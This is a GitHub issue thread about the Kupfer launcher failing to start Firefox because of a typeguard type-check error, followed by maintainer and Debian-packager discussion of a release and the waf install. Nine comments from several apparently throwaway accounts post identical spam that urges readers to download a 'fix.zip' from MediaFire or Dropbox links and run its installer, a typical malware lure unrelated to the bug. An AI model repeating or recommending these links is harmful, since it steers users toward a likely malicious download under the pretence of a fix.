### ISSUE TITLE
Kupfer fails to start firefox

### ISSUE THREAD

**Issue by aragilar** [kupferlauncher/kupfer#180]
```
[kupfer.core.commandexec] ActionExecutionContext: <kupfer.obj.apps.AppLeaf firefox> <kupfer.obj.apps.Launch> None <GUIEnvironmentContext time=78682 screen=<GdkX11.X11Screen object at 0x7f70663ae900 (GdkX11Screen at 0x2ac1cbc0)>>
Traceback (most recent call last):
  File "/usr/share/kupfer/kupfer/ui/interface.py", line 962, in _on_activate
    self._data_ctrl.activate(ui_ctx=self._make_gui_ctx())
  File "/usr/share/kupfer/kupfer/core/datactrl.py", line 587, in activate
    res, _ret = ctx.run(leaf, action, sobject, ui_ctx=ui_ctx)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/kupfer/kupfer/core/commandexec.py", line 372, in run
    ret = activate_action(execution_token, obj, action, iobj)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/kupfer/kupfer/core/commandexec.py", line 590, in activate_action
    return _activate_action_single(obj, action, iobj, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/kupfer/kupfer/core/commandexec.py", line 598, in _activate_action_single
    func: ActionActivateFunc = action.activate
  File "/usr/lib/python3/dist-packages/typeguard/_functions.py", line 251, in check_variable_assignment
    check_type_internal(value, annotation, memo)
  File "/usr/lib/python3/dist-packages/typeguard/_checkers.py", line 861, in check_type_internal
    checker(value, origin_type, args, memo)
  File "/usr/lib/python3/dist-packages/typeguard/_checkers.py", line 738, in check_protocol
    raise TypeCheckError(
typeguard.TypeCheckError: value assigned to func (method) is not compatible with the ActionActivateFunc protocol because it has no attribute named '__weakref__'
```

### Environment

Kupfer Version: 327-1
Window Manager: awesomewm
Desktop Environment: none
Linux Distribution: Debian

### Actual Behaviour
Kupfer ignored the instruction to run when hitting enter, and every enter press prints the above traceback.

### Expected Behaviour
Firefox would be launched.

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by aragilar** [comment]
Can a new release be made so linux distros can pick up the fix?

**Comment by KarolBedkowski** [comment]
Yes, but:
1. kupfer.py may be used safe *only* for development; not even for debugging
2. using typeguard broke some plugins and this not fixable
3. Kupfer will be slow, sometimes - very slow
4. locales and documentations is not generated

Users / distros should follow manual (use ./waf configure, ./waf install) and launch Kupfer by generated files.

**Comment by hosiet** [comment]
Hi, Debian/Ubuntu _de facto_ kupfer packager here. You may check the package status at https://tracker.debian.org/pkg/kupfer .

I believe in Debian's packaging I was following `waf configure` and `waf install` to install the wrapper of `/usr/bin/kupfer`, but as I see from the generated `/usr/bin/kupfer` it eventually still tries to `exec` the `kupfer.py` script, and your added warning will appear. Is that expected or do I need any other tweaks?

**Comment by KarolBedkowski** [comment]
He, There is a bigger problem... There will be patch for this.
